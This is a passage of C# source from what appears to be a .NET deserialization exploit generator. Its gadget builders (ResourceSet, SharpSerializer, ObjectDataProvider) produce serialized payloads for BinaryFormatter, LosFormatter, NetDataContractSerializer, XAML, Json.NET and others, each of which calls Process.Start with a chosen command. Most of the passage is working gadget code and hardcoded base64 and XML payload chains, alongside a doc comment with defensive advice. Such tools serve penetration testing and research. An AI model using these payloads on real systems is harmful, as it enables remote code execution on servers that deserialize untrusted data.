                serializer.UnPickleOfString <Object>(payload);
            }
            catch (Exception err)
            {
                Debugging.ShowErrors(inputArgs, err);
            }
        }
        return(payload);
    }
    else if (formatter.ToLowerInvariant().Equals("sharpserializerbinary"))
    {
        // Binary Serialization Mode
        // Passes the raw inputArgs.Cmd (not the split FileName/Arguments) to the
        // helper. Unlike the branches above, Test mode here has no try/catch, so a
        // failed round-trip propagates to the caller; Minify is not consulted.
        object serializedData = SerializersHelper.SharpSerializer_ObjectDataProvider_Binary_Serialize(inputArgs.Cmd);
        if (inputArgs.Test)
        {
            SerializersHelper.SharpSerializer_ObjectDataProvider_Binary_Deserialize(serializedData);
        }
        return(serializedData);
    }
    else if (formatter.ToLowerInvariant().Equals("sharpserializerxml"))
    {
        // XML Serialization Mode
        // Same shape as the binary branch: raw inputArgs.Cmd, no try/catch around
        // the test round-trip, Minify not consulted.
        string serializedData = (string)SerializersHelper.SharpSerializer_ObjectDataProvider_Xml_Serialize(inputArgs.Cmd);
        if (inputArgs.Test)
        {
            SerializersHelper.SharpSerializer_ObjectDataProvider_Xml_Deserialize(serializedData);
        }
        return(serializedData);
    }
    else
    {
        // NOTE(review): a more specific type (e.g. NotSupportedException or
        // ArgumentException) would let callers distinguish an unknown formatter
        // name from unexpected failures.
        throw new Exception("Formatter not supported");
    }
}
public override object Generate(string formatter, InputArgs inputArgs) { /* * // This is how ResourceSet can be used directly but the payload would fire! * object generatedPayload = TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget(inputArgs); * * using (ResourceWriter rw = new ResourceWriter(@".\ResourceSetGenerator.resources")) * { * rw.AddResource("", generatedPayload); * rw.Generate(); * rw.Close(); * } * * // Payload will be executed once here which is annoying but without surgical insertion or something to parse binaryformatter objects, it is quite hard to prevent this * ResourceSet myResourceSet = new ResourceSet(@".\ResourceSetGenerator.resources"); * * // TextFormattingRunPropertiesGenerator is the preferred method due to its short length. However, we need to insert it manually into a serialized object as ResourceSet cannot tolerate it * * //*/ //TestMore(inputArgs); if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase)) { string payload = ""; // This to prevent code execution when running byte[] bfSerializedObj; if (internalgadget == 1) { // This is an example of using SimpleBinaryFormatterParser // string obj25Type = "", obj25Value = "", obj26Value = ""; byte[] cmdFile7bitLV = SimpleBinaryFormatterParser.Create7bitLengthObjectString(inputArgs.CmdFileName); byte[] obj26ValueObjId = new byte[] { 0x0c, 0, 0, 0 }; obj26Value = Convert.ToBase64String(SimpleBinaryFormatterParser.ConcatTwoByteArrays(obj26ValueObjId, cmdFile7bitLV)); if (inputArgs.HasArguments) { byte[] obj25TypeByte = new byte[] { 0x06 }; byte[] obj25ValueObjId = new byte[] { 0x0b, 0, 0, 0 }; byte[] cmdArgs7bitLV = SimpleBinaryFormatterParser.Create7bitLengthObjectString(inputArgs.CmdArguments); obj25Type = Convert.ToBase64String(obj25TypeByte); obj25Value = Convert.ToBase64String(SimpleBinaryFormatterParser.ConcatTwoByteArrays(obj25ValueObjId, cmdArgs7bitLV)); } else { byte[] obj25TypeByte = new 
byte[] { 0x09 }; byte[] obj25ValueObjId = new byte[] { 0x05, 0, 0, 0 }; obj25Type = Convert.ToBase64String(obj25TypeByte); obj25Value = Convert.ToBase64String(obj25ValueObjId); } payload = @"{'headerBytes':'AAEAAAD/////AQAAAAAAAAA=','binaryFormatterObjects':[{'orderId':1,'typeBytes':'BA==','valueBytes':'AQAAABxTeXN0ZW0uUmVzb3VyY2VzLlJlc291cmNlU2V0AgAAAAVUYWJsZRVfY2FzZUluc2Vuc2l0aXZlVGFibGUDAxxTeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlHFN5c3RlbS5Db2xsZWN0aW9ucy5IYXNodGFibGU='},{'orderId':2,'typeBytes':'CQ==','valueBytes':'AgAAAA=='},{'orderId':3,'typeBytes':'Cg==','valueBytes':''},{'orderId':4,'typeBytes':'BA==','valueBytes':'AgAAABxTeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlBwAAAApMb2FkRmFjdG9yB1ZlcnNpb24IQ29tcGFyZXIQSGFzaENvZGVQcm92aWRlcghIYXNoU2l6ZQRLZXlzBlZhbHVlcwAAAwMABQULCBxTeXN0ZW0uQ29sbGVjdGlvbnMuSUNvbXBhcmVyJFN5c3RlbS5Db2xsZWN0aW9ucy5JSGFzaENvZGVQcm92aWRlcgg='},{'orderId':5,'typeBytes':null,'valueBytes':'7FE4Pw=='},{'orderId':6,'typeBytes':null,'valueBytes':'AQAAAA=='},{'orderId':7,'typeBytes':'Cg==','valueBytes':''},{'orderId':8,'typeBytes':'Cg==','valueBytes':''},{'orderId':9,'typeBytes':null,'valueBytes':'AwAAAA=='},{'orderId':10,'typeBytes':'CQ==','valueBytes':'AwAAAA=='},{'orderId':11,'typeBytes':'CQ==','valueBytes':'BAAAAA=='},{'orderId':12,'typeBytes':'EA==','valueBytes':'AwAAAAEAAAA='},{'orderId':13,'typeBytes':'Bg==','valueBytes':'BQAAAAA='},{'orderId':14,'typeBytes':'EA==','valueBytes':'BAAAAAEAAAA='},{'orderId':15,'typeBytes':'CQ==','valueBytes':'BgAAAA=='},{'orderId':16,'typeBytes':'DA==','valueBytes':'BwAAAEZTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5'},{'orderId':17,'typeBytes':'BQ==','valueBytes':'BgAAAEBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Tb3J0ZWRTZXRgMVtbU3lzdGVtLlN0cmluZyxtc2NvcmxpYl1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABghJU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuQ29tcGFyaXNvbkNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsbXNjb3JsaWJdXQgHAAAA'},{'orderId':18,'typeBytes':null,'valueBytes':'AgAAAA=='},{'orde
rId':19,'typeBytes':'CQ==','valueBytes':'CAAAAA=='},{'orderId':20,'typeBytes':null,'valueBytes':'AgAAAA=='},{'orderId':21,'typeBytes':'CQ==','valueBytes':'CQAAAA=='},{'orderId':22,'typeBytes':'BA==','valueBytes':'CAAAAElTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZyxtc2NvcmxpYl1dAQAAAAtfY29tcGFyaXNvbgMiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcg=='},{'orderId':23,'typeBytes':'CQ==','valueBytes':'CgAAAA=='},{'orderId':24,'typeBytes':'EQ==','valueBytes':'CQAAAAIAAAA='},{'orderId':25,'typeBytes':'" + obj25Type + @"','valueBytes':'" + obj25Value + @"'},{'orderId':26,'typeBytes':'Bg==','valueBytes':'" + obj26Value + @"'},{'orderId':27,'typeBytes':'BA==','valueBytes':'CgAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVy'},{'orderId':28,'typeBytes':'CQ==','valueBytes':'DQAAAA=='},{'orderId':29,'typeBytes':'CQ==','valueBytes':'DgAAAA=='},{'orderId':30,'typeBytes':'CQ==','valueBytes':'DwAAAA=='},{'orderId':31,'typeBytes':'BA==','valueBytes':'DQAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQ=='},{'orderId':32,'typeBytes':'Bg==','valueBytes':'EAAAAKQBU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZyxtc2NvcmxpYl0sW1N5c3RlbS5TdHJpbmcsbXNjb3JsaWJdLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyxTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0='},{'orderId':33,'typeBytes':'Bg==','valueBytes':'EQAAAAhtc2NvcmxpYg=='},{'orderId':34,'typeBytes':'Cg==','valueBytes':''},{'orderId':35,'typeBytes':'Bg==','valueBytes':'EgAAAEZTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZ
XlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5'},{'orderId':36,'typeBytes':'Bg==','valueBytes':'EwAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzcw=='},{'orderId':37,'typeBytes':'Bg==','valueBytes':'FAAAAAVTdGFydA=='},{'orderId':38,'typeBytes':'CQ==','valueBytes':'FQAAAA=='},{'orderId':39,'typeBytes':'BA==','valueBytes':'DgAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgYAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAAMIDVN5c3RlbS5UeXBlW10='},{'orderId':40,'typeBytes':'CQ==','valueBytes':'FAAAAA=='},{'orderId':41,'typeBytes':'CQ==','valueBytes':'EgAAAA=='},{'orderId':42,'typeBytes':'CQ==','valueBytes':'EwAAAA=='},{'orderId':43,'typeBytes':'Bg==','valueBytes':'GQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQ=='},{'orderId':44,'typeBytes':null,'valueBytes':'CAAAAA=='},{'orderId':45,'typeBytes':'Cg==','valueBytes':''},{'orderId':46,'typeBytes':'AQ==','valueBytes':'DwAAAA4AAAA='},{'orderId':47,'typeBytes':'Bg==','valueBytes':'GgAAAAdDb21wYXJl'},{'orderId':48,'typeBytes':'CQ==','valueBytes':'EQAAAA=='},{'orderId':49,'typeBytes':'Bg==','valueBytes':'HAAAAA1TeXN0ZW0uU3RyaW5n'},{'orderId':50,'typeBytes':'Bg==','valueBytes':'HQAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcp'},{'orderId':51,'typeBytes':null,'valueBytes':'CAAAAA=='},{'orderId':52,'typeBytes':'Cg==','valueBytes':''},{'orderId':53,'typeBytes':'AQ==','valueBytes':'FQAAAA0AAAA='},{'orderId':54,'typeBytes':'Bg==','valueBytes':'HgAAAC1TeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLG1zY29ybGliXV0='},{'orderId':55,'typeBytes':'CQ==','valueBytes':'EQAAAA=='},{'orderId':56,'typeBytes':'Cg==','valueBytes':''},{'orderId':57,'typeBytes':'CQ==','valueBytes':'EQAAAA=='},{'orderId':58,'typeBytes':'CQ==','valueBytes':'HAAAAA=='},{'orderId':59,'typeBytes':'CQ==','valueBytes':'GgAAAA=='},{'orderId':60,'typeBytes':'Cg==','valueBytes':''},{'orderId':61,'typeBytes':'Cw==','valueBytes':''}]}"; bfSerializedObj = 
SimpleBinaryFormatterParser.JsonToStream(payload).ToArray(); } else { // This is an example of using AdvancedBinaryFormatterParser which is recommended over SimpleBinaryFormatterParser but it is much longer // In this gadget however, this feels like cheating as System.Resources.ResourceSet can be replaced by anything given the TextFormattingRunProperties gadget triggers first ObjectDataProviderGenerator myObjectDataProviderGenerator = new ObjectDataProviderGenerator(); string xaml_payload = myObjectDataProviderGenerator.GenerateWithNoTest("xaml", inputArgs).ToString(); if (inputArgs.Minify) { xaml_payload = XMLMinifier.Minify(xaml_payload, null, null); } xaml_payload = CommandArgSplitter.JsonStringEscape(xaml_payload); // This payload has been minified manually too by removing some of the unnecessary items! payload = @"[{'Id': 1, 'Data': { '$type': 'SerializationHeaderRecord', 'binaryFormatterMajorVersion': 1, 'binaryFormatterMinorVersion': 0, 'binaryHeaderEnum': 0, 'topId': 1, 'headerId': -1, 'majorVersion': 1, 'minorVersion': 0 }},{'Id': 2, 'TypeName': 'ObjectWithMapTyped', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 4, 'objectId': 1, 'name': 'System.Resources.ResourceSet', 'numMembers': 2, 'memberNames':['',''], 'binaryTypeEnumA':[3,3], 'typeInformationA':[null,null], 'typeInformationB':['',''], 'memberAssemIds':[0,0], 'assemId': 0 }},{'Id': 3, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 2 }},{'Id': 4, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 1 }},{'Id': 5, 'TypeName': 'ObjectWithMapTyped', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 4, 'objectId': 2, 'name': 'System.Collections.Hashtable', 'numMembers': 5, 'memberNames':['LoadFactor','Version','Comparer','','HashSize'], 'binaryTypeEnumA':[0,0,3,3,0], 'typeInformationA':[11,8,null,null,8], 'typeInformationB':[11,8,'','',8], 'memberAssemIds':[0,0,0,0,0], 'assemId': 0 }},{'Id': 6, 'TypeName': 'Single', 
'IsPrimitive': true, 'Data': { '$type': 'MemberPrimitiveUnTyped', 'typeInformation': 11, 'value': 0 }},{'Id': 7, 'TypeName': 'Int32', 'IsPrimitive': true, 'Data': { '$type': 'MemberPrimitiveUnTyped', 'typeInformation': 8, 'value': 1 }},{'Id': 8, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 1 }},{'Id': 9, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 1 }},{'Id': 10, 'TypeName': 'Int32', 'IsPrimitive': true, 'Data': { '$type': 'MemberPrimitiveUnTyped', 'typeInformation': 8, 'value': 3 }},{'Id': 11, 'TypeName': 'Assembly', 'Data': { '$type': 'BinaryAssembly', 'assemId': 7, 'assemblyString': 'Microsoft.PowerShell.Editor' }},{'Id': 12, 'TypeName': 'ObjectWithMapTypedAssemId', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 5, 'objectId': 6, 'name': 'Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties', 'numMembers': 1, 'memberNames':['ForegroundBrush'], 'binaryTypeEnumA':[1], 'typeInformationA':[null], 'typeInformationB':[null], 'memberAssemIds':[0], 'assemId': 7 }},{'Id': 13, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 8, 'value': '" + xaml_payload + @"' }},{'Id': 14, 'TypeName': 'MessageEnd', 'Data': { '$type': 'MessageEnd' }}]"; bfSerializedObj = AdvancedBinaryFormatterParser.JsonToStream(payload).ToArray(); } if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)) { if (inputArgs.Test) { try { MemoryStream ms = new MemoryStream(bfSerializedObj); ms.Position = 0; System.Runtime.Serialization.Formatters.Binary.BinaryFormatter bf = new System.Runtime.Serialization.Formatters.Binary.BinaryFormatter(); bf.Deserialize(ms); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(bfSerializedObj); } else { // it is LosFormatter byte[] lfSerializedObj = SimpleMinifiedObjectLosFormatter.BFStreamToLosFormatterStream(bfSerializedObj); MemoryStream ms = new MemoryStream(lfSerializedObj); ms.Position = 0; if 
(inputArgs.Test) { try { System.Web.UI.LosFormatter lf = new System.Web.UI.LosFormatter(); lf.Deserialize(ms); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(lfSerializedObj); } //return Serialize(myResourceSet, formatter, inputArgs); } else if (formatter.Equals("netdatacontractserializer", StringComparison.OrdinalIgnoreCase)) { inputArgs.CmdType = CommandArgSplitter.CommandType.XML; string ndcPayload = ""; if (internalgadget == 1) { string cmdPart = ""; if (inputArgs.HasArguments) { cmdPart = "<c:string>" + inputArgs.CmdArguments + "</c:string><c:string>" + inputArgs.CmdFileName + "</c:string>"; } else { cmdPart = @"<c:string a:nil=""true""/><c:string>" + inputArgs.CmdFileName + "</c:string>"; } ndcPayload = @"<w b:Type=""System.Resources.ResourceSet"" b:Assembly=""0"" xmlns=""http://schemas.datacontract.org/2004/07/System.Resources"" xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/""><Table b:Type=""System.Collections.Hashtable"" b:Assembly=""0"" xmlns:c=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""><LoadFactor b:Type=""System.Single"" b:Assembly=""0"" xmlns="""">0</LoadFactor><Version b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">1</Version><HashSize b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">3</HashSize><Values b:Type=""System.Object[]"" b:Assembly=""0"" b:Size=""1"" xmlns=""""><c:anyType b:Type=""System.Collections.Generic.SortedSet`1[[System.String,mscorlib]]"" b:Assembly=""System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089""><Count b:Type=""System.Int32"" b:Assembly=""0"">2</Count><Comparer b:Type=""System.Collections.Generic.ComparisonComparer`1[[System.String,mscorlib]]"" b:Assembly=""0""><_comparison b:FactoryType=""d:DelegateSerializationHolder"" b:Type=""System.DelegateSerializationHolder"" b:Assembly=""0"" xmlns=""http://schemas.datacontract.org/2004/07/System.Collections.Generic"" 
xmlns:d=""http://schemas.datacontract.org/2004/07/System""><Delegate b:Type=""System.DelegateSerializationHolder+DelegateEntry"" b:Assembly=""0"" xmlns=""""><d:assembly b:Id=""1"">mscorlib</d:assembly><d:delegateEntry><d:assembly b:Ref=""1"" a:nil=""1""/><d:delegateEntry a:nil=""1""/><d:methodName b:Id=""2"">Compare</d:methodName><d:target a:nil=""1""/><d:targetTypeAssembly b:Ref=""1"" a:nil=""1""/><d:targetTypeName b:Id=""3"">System.String</d:targetTypeName><d:type>System.Comparison`1[[System.String,mscorlib]]</d:type></d:delegateEntry><d:methodName b:Id=""4"">Start</d:methodName><d:target a:nil=""1""/><d:targetTypeAssembly b:Id=""5"">System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089</d:targetTypeAssembly><d:targetTypeName b:Id=""6"">System.Diagnostics.Process</d:targetTypeName><d:type>System.Func`3[[System.String,mscorlib],[System.String,mscorlib],[System.Diagnostics.Process,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089]]</d:type></Delegate><method0 b:FactoryType=""e:MemberInfoSerializationHolder"" b:Type=""System.Reflection.MemberInfoSerializationHolder"" b:Assembly=""0"" xmlns=""""><Name b:Ref=""4"" a:nil=""1""/><AssemblyName b:Ref=""5"" a:nil=""1""/><ClassName b:Ref=""6"" a:nil=""1""/><Signature b:Type=""System.String"" b:Assembly=""0"">System.Diagnostics.Process Start(System.String, System.String)</Signature><MemberType b:Type=""System.Int32"" b:Assembly=""0"">8</MemberType><GenericArguments a:nil=""1""/></method0><method1 b:FactoryType=""e:MemberInfoSerializationHolder"" b:Type=""System.Reflection.MemberInfoSerializationHolder"" b:Assembly=""0"" xmlns=""""><Name b:Ref=""2"" a:nil=""1""/><AssemblyName b:Ref=""1"" a:nil=""1""/><ClassName b:Ref=""3"" a:nil=""1""/><Signature b:Type=""System.String"" b:Assembly=""0"">Int32 Compare(System.String, System.String)</Signature><MemberType b:Type=""System.Int32"" b:Assembly=""0"">8</MemberType></method1></_comparison></Comparer><Version b:Type=""System.Int32"" 
b:Assembly=""0"">2</Version><Items b:Type=""System.String[]"" b:Assembly=""0"" b:Size=""2"">" + cmdPart + @"</Items></c:anyType></Values></Table></w>"; } else { ObjectDataProviderGenerator myObjectDataProviderGenerator = new ObjectDataProviderGenerator(); string xaml_payload = myObjectDataProviderGenerator.GenerateWithNoTest("xaml", inputArgs).ToString(); if (inputArgs.Minify) { xaml_payload = XMLMinifier.Minify(xaml_payload, null, null); } ndcPayload = @"<w b:Type=""System.Resources.ResourceSet"" b:Assembly=""0"" xmlns=""http://schemas.datacontract.org/2004/07/System.Resources"" xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/""><Table b:Type=""System.Collections.Hashtable"" b:Assembly=""0"" xmlns:c=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""><LoadFactor b:Type=""System.Single"" b:Assembly=""0"" xmlns="""">0</LoadFactor><Version b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">1</Version><HashSize b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">3</HashSize><Values b:Type=""System.Object[]"" b:Assembly=""0"" b:Size=""1"" xmlns=""""><c:anyType b:Type=""Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties"" b:Assembly=""Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35""><ForegroundBrush b:Type=""System.String"" b:Assembly=""0""><![CDATA[" + xaml_payload + @"]]></ForegroundBrush></c:anyType></Values></Table></w>"; //</Values></Table></w> can also be removed to make it even shorter! Why? IDK atm! 
} if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { ndcPayload = XMLMinifier.Minify(ndcPayload, new string[] { "mscorlib", "Microsoft.PowerShell.Editor" }, new string[] { "</Values></Table></w>" }, FormatterType.NetDataContractXML, true); } else { ndcPayload = XMLMinifier.Minify(ndcPayload, null, new string[] { "</Values></Table></w>" }, FormatterType.NetDataContractXML, true); } } if (inputArgs.Test) { try { SerializersHelper.NetDataContractSerializer_deserialize(ndcPayload); /* * MemoryStream ms = new MemoryStream(Encoding.UTF8.GetBytes(ndcPayload)); * ms.Position = 0; * ndcs.Deserialize(ms); */ } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(ndcPayload); //return Serialize(myResourceSet, formatter, inputArgs); } else { throw new Exception("Formatter not supported"); } }
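/// <summary>
/// Builds an ObjectDataProvider-based payload for the requested <paramref name="formatter"/>.
/// Every variant describes the same object graph — a System.Windows.Data.ObjectDataProvider whose
/// MethodName is "Start" and whose ObjectInstance/ObjectType is System.Diagnostics.Process — in the
/// target serializer's own type-annotated syntax ("$type", "__type", "!&lt;!...&gt;", xsi:type, FsPickler "NamedType").
/// From a defensive point of view the common denominator is that the consumer honours type names carried
/// in the input; refusing type-name-bearing input (or allow-listing the types a deserializer may create)
/// neutralises all of these variants, and the fully qualified ObjectDataProvider / Process names are the
/// natural signature for detection.
/// </summary>
/// <param name="formatter">Target serializer name, matched case-insensitively using ordinal rules.</param>
/// <param name="inputArgs">Command and options. For the text formatters <c>CmdType</c> is set before
/// <c>CmdFileName</c>/<c>CmdArguments</c> are read (the original code does this too — presumably those
/// properties are escaped according to it).</param>
/// <returns>The payload as a <see cref="string"/>.</returns>
/// <exception cref="ArgumentNullException"><paramref name="formatter"/> or <paramref name="inputArgs"/> is null.</exception>
/// <exception cref="NotSupportedException"><paramref name="formatter"/> is not one of the supported names.</exception>
public override object Generate(string formatter, InputArgs inputArgs)
{
    // NOTE: What is Xaml2? Xaml2 uses ResourceDictionary in addition to just using ObjectDataProvider as in Xaml
    if (formatter == null)
    {
        throw new ArgumentNullException(nameof(formatter));
    }
    if (inputArgs == null)
    {
        throw new ArgumentNullException(nameof(inputArgs));
    }

    // ToLowerInvariant rather than ToLower: the culture-sensitive lower-casing used before could fail to
    // match names containing "i" under some cultures (e.g. tr-TR). The other generators in this file
    // already compare with StringComparison.OrdinalIgnoreCase.
    switch (formatter.ToLowerInvariant())
    {
        case "xaml":
            return BuildXamlPayload(inputArgs, false);
        case "xaml2":
            return BuildXamlPayload(inputArgs, true);
        case "json.net":
            return BuildJsonNetPayload(inputArgs);
        case "fastjson":
            return BuildFastJsonPayload(inputArgs);
        case "javascriptserializer":
            return BuildJavaScriptSerializerPayload(inputArgs);
        case "xmlserializer":
            return BuildXmlSerializerPayload(inputArgs);
        case "datacontractserializer2":
            return BuildDataContractSerializer2Payload(inputArgs);
        case "datacontractserializer":
            return BuildDataContractSerializerPayload(inputArgs);
        case "yamldotnet":
            return BuildYamlDotNetPayload(inputArgs);
        case "fspickler":
            return BuildFsPicklerPayload(inputArgs);
        default:
            throw new NotSupportedException("Formatter not supported");
    }
}

/// <summary>
/// Assembly-qualified name of the ExpandedWrapper`2 closed over XamlReader and ObjectDataProvider, used as
/// the root type of the XmlSerializer and DataContractSerializer2 variants.
/// </summary>
private const string XamlReaderExpandedWrapperTypeName =
    "System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089";

/// <summary>
/// Builds the XAML ResourceDictionary fragment shared by the XmlSerializer, DataContractSerializer2 and
/// FsPickler variants: an ObjectDataProvider with ObjectType System.Diagnostics.Process, MethodName "Start"
/// and MethodParameters holding the file name and, when <c>HasArguments</c> is set, the arguments.
/// Callers set <c>inputArgs.CmdType</c> to XML before calling, as the original branches did.
/// </summary>
/// <param name="inputArgs">Source of <c>CmdFileName</c>, <c>CmdArguments</c> and <c>HasArguments</c>.</param>
/// <returns>The XAML markup (not yet escaped for any outer container).</returns>
private static string BuildProcessStartXaml(InputArgs inputArgs)
{
    string cmdPart;
    if (inputArgs.HasArguments)
    {
        cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>";
    }
    else
    {
        cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>";
    }

    // cmdPart opens <ObjectDataProvider.MethodParameters>; the closing tag is appended here, matching the
    // original layout.
    return @"<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{d:Type c:Process}"" MethodName=""Start"">"
        + cmdPart
        + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>";
}

/// <summary>
/// Serialises a real ObjectDataProvider/Process object graph with <see cref="XamlWriter"/>; "xaml2" wraps
/// it in a ResourceDictionary first.
/// </summary>
/// <param name="inputArgs">Command and options.</param>
/// <param name="useResourceDictionary">True for the "xaml2" variant.</param>
/// <returns>The XAML payload.</returns>
private static string BuildXamlPayload(InputArgs inputArgs, bool useResourceDictionary)
{
    ProcessStartInfo psi = new ProcessStartInfo();
    psi.FileName = inputArgs.CmdFileName;
    if (inputArgs.HasArguments)
    {
        psi.Arguments = inputArgs.CmdArguments;
    }

    // Replaces the private environment block with an empty dictionary via reflection — presumably so the
    // generator's own environment is not serialised into the output. NOTE(review): GetField returns null if
    // the runtime renames the field, which then surfaces as a NullReferenceException — confirm the target
    // framework before relying on this.
    StringDictionary dict = new StringDictionary();
    psi.GetType().GetField("environmentVariables", BindingFlags.Instance | BindingFlags.NonPublic).SetValue(psi, dict);

    Process p = new Process();
    p.StartInfo = psi;

    ObjectDataProvider odp = new ObjectDataProvider();
    odp.MethodName = "Start";
    odp.IsInitialLoadEnabled = false;
    odp.ObjectInstance = p;

    string payload;
    if (useResourceDictionary)
    {
        ResourceDictionary myResourceDictionary = new ResourceDictionary();
        myResourceDictionary.Add("", odp);
        payload = XamlWriter.Save(myResourceDictionary);
    }
    else
    {
        payload = XamlWriter.Save(odp);
    }

    if (inputArgs.Minify)
    {
        // using discardable regex array to make it shorter!
        payload = XMLMinifier.Minify(payload, null, new String[] { @"StandardErrorEncoding=.*LoadUserProfile=""False"" ", @"IsInitialLoadEnabled=""False"" " });
    }

    if (inputArgs.Test)
    {
        try
        {
            SerializersHelper.Xaml_deserialize(payload);
        }
        catch (Exception err)
        {
            // Previously swallowed silently; routed through the same debug hook the other generators use.
            Debugging.ShowErrors(inputArgs, err);
        }
    }

    return payload;
}

/// <summary>
/// Json.NET variant: "$type"-annotated ObjectDataProvider whose MethodParameters ArrayList carries the
/// command. Only meaningful where the consumer resolves "$type" (i.e. TypeNameHandling is not None).
/// </summary>
/// <param name="inputArgs">Command and options; <c>CmdType</c> is set to JSON here.</param>
/// <returns>The JSON payload.</returns>
private static string BuildJsonNetPayload(InputArgs inputArgs)
{
    inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;

    string cmdPart;
    if (inputArgs.HasArguments)
    {
        cmdPart = "'" + inputArgs.CmdFileName + "', '" + inputArgs.CmdArguments + "'";
    }
    else
    {
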